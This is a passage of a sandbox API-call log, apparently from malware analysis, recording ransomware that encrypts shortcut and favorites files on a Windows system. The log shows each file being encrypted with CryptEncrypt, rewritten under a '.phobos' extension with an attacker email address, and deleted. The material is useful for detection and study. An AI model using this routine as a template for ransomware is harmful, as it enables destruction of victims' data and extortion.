(lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Command Prompt.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\command prompt.lnk")) returned 1 [0211.247] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0211.247] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Notepad.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\notepad.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0211.248] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1304) returned 1 [0211.248] CloseHandle (hObject=0xac) returned 1 [0211.248] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Notepad.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\notepad.lnk")) returned 0x20 [0211.248] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Notepad.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\notepad.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0211.248] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Notepad.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\notepad.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0211.248] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0211.248] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0211.248] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Notepad.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\notepad.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0211.249] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0211.249] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0211.249] ReadFile (in: hFile=0xac, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x518, lpOverlapped=0x0) returned 1 [0211.278] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x520, dwBufLen=0x520 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x520) returned 1 [0211.278] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x520, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x520, lpOverlapped=0x0) returned 1 [0211.278] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0211.278] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0211.279] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0211.279] CryptDestroyKey (hKey=0xa32a28) returned 1 [0211.279] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0211.279] CryptDestroyKey (hKey=0xa32928) returned 1 [0211.279] CloseHandle (hObject=0xac) returned 1 [0211.279] CloseHandle (hObject=0xfc) returned 1 [0211.279] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Notepad.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\notepad.lnk")) returned 1 [0211.280] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0211.280] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Private Character Editor.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\private character editor.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0211.280] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1306) returned 1 [0211.280] CloseHandle (hObject=0xfc) returned 1 [0211.280] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Private Character Editor.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\private character editor.lnk")) returned 0x20 [0211.280] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Private Character Editor.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\private character editor.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0211.281] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Private Character Editor.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\private character editor.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0211.281] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0211.281] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0211.281] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Private Character Editor.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\private character editor.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0211.281] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0211.281] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0211.281] ReadFile (in: hFile=0xfc, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x51a, lpOverlapped=0x0) returned 1 [0211.637] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x520, dwBufLen=0x520 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x520) returned 1 [0211.637] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x520, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x520, lpOverlapped=0x0) returned 1 [0211.638] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0211.638] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0211.638] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60, dwBufLen=0x60 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60) returned 1 [0211.638] CryptDestroyKey (hKey=0xa32a28) returned 1 [0211.638] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x112, lpOverlapped=0x0) returned 1 [0211.638] CryptDestroyKey (hKey=0xa32928) returned 1 [0211.638] CloseHandle (hObject=0xfc) returned 1 [0211.638] CloseHandle (hObject=0xac) returned 1 [0211.638] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Private Character Editor.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\private character editor.lnk")) returned 1 [0211.639] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0211.639] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Internet Explorer (64-bit).lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\internet explorer (64-bit).lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0211.640] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1415) returned 1 [0211.640] CloseHandle (hObject=0xac) returned 1 [0211.640] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Internet Explorer (64-bit).lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\internet explorer (64-bit).lnk")) returned 0x20 [0211.640] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Internet Explorer (64-bit).lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\internet explorer (64-bit).lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0211.640] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Internet Explorer (64-bit).lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\internet explorer (64-bit).lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0211.640] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0211.640] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0211.640] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Internet Explorer (64-bit).lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\internet explorer (64-bit).lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0211.641] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0211.641] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0211.641] ReadFile (in: hFile=0xac, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x587, lpOverlapped=0x0) returned 1 [0211.742] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x590, dwBufLen=0x590 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x590) returned 1 [0211.742] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x590, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x590, lpOverlapped=0x0) returned 1 [0211.743] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0211.743] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0211.743] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60, dwBufLen=0x60 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60) returned 1 [0211.743] CryptDestroyKey (hKey=0xa32a28) returned 1 [0211.743] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x112, lpOverlapped=0x0) returned 1 [0211.744] CryptDestroyKey (hKey=0xa32928) returned 1 [0211.744] CloseHandle (hObject=0xac) returned 1 [0211.744] CloseHandle (hObject=0xfc) returned 1 [0211.744] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Internet Explorer (64-bit).lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\internet explorer (64-bit).lnk")) returned 1 [0211.745] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0211.745] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Help.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\maintenance\\help.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0211.747] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=262) returned 1 [0211.747] CloseHandle (hObject=0xfc) returned 1 [0211.747] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Help.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\maintenance\\help.lnk")) returned 0x20 [0211.747] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Help.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\maintenance\\help.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0211.747] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Help.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\maintenance\\help.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0211.748] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0211.748] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0211.748] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Help.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\maintenance\\help.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0211.816] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0211.816] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0211.816] ReadFile (in: hFile=0xfc, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x106, lpOverlapped=0x0) returned 1 [0211.816] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x110, dwBufLen=0x110 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x110) returned 1 [0211.816] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x110, lpOverlapped=0x0) returned 1 [0211.817] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0211.817] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0211.817] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0211.817] CryptDestroyKey (hKey=0xa32a28) returned 1 [0211.817] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0211.817] CryptDestroyKey (hKey=0xa32928) returned 1 [0211.817] CloseHandle (hObject=0xfc) returned 1 [0211.817] CloseHandle (hObject=0xac) returned 1 [0211.818] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Help.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\maintenance\\help.lnk")) returned 1 [0211.818] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0211.818] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\default\\favorites\\links\\web slice gallery.url"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0211.819] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=226) returned 1 [0211.819] CloseHandle (hObject=0xac) returned 1 [0211.819] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\default\\favorites\\links\\web slice gallery.url")) returned 0x20 [0211.819] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\favorites\\links\\web slice gallery.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0211.819] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\default\\favorites\\links\\web slice gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0211.819] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0211.819] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0211.819] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\favorites\\links\\web slice gallery.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0211.821] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0211.821] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0211.821] ReadFile (in: hFile=0xac, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xe2, lpOverlapped=0x0) returned 1 [0211.822] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xf0, dwBufLen=0xf0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xf0) returned 1 [0211.822] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf0, lpOverlapped=0x0) returned 1 [0211.823] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0211.823] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0211.823] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0211.823] CryptDestroyKey (hKey=0xa32a28) returned 1 [0211.823] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0211.823] CryptDestroyKey (hKey=0xa32928) returned 1 [0211.823] CloseHandle (hObject=0xac) returned 1 [0211.823] CloseHandle (hObject=0xfc) returned 1 [0211.823] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\default\\favorites\\links\\web slice gallery.url")) returned 1 [0211.824] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0211.824] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie add-on site.url"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0211.825] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=133) returned 1 [0211.825] CloseHandle (hObject=0xfc) returned 1 [0211.825] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie add-on site.url")) returned 0x20 [0211.825] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie add-on site.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0211.825] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie add-on site.url"), 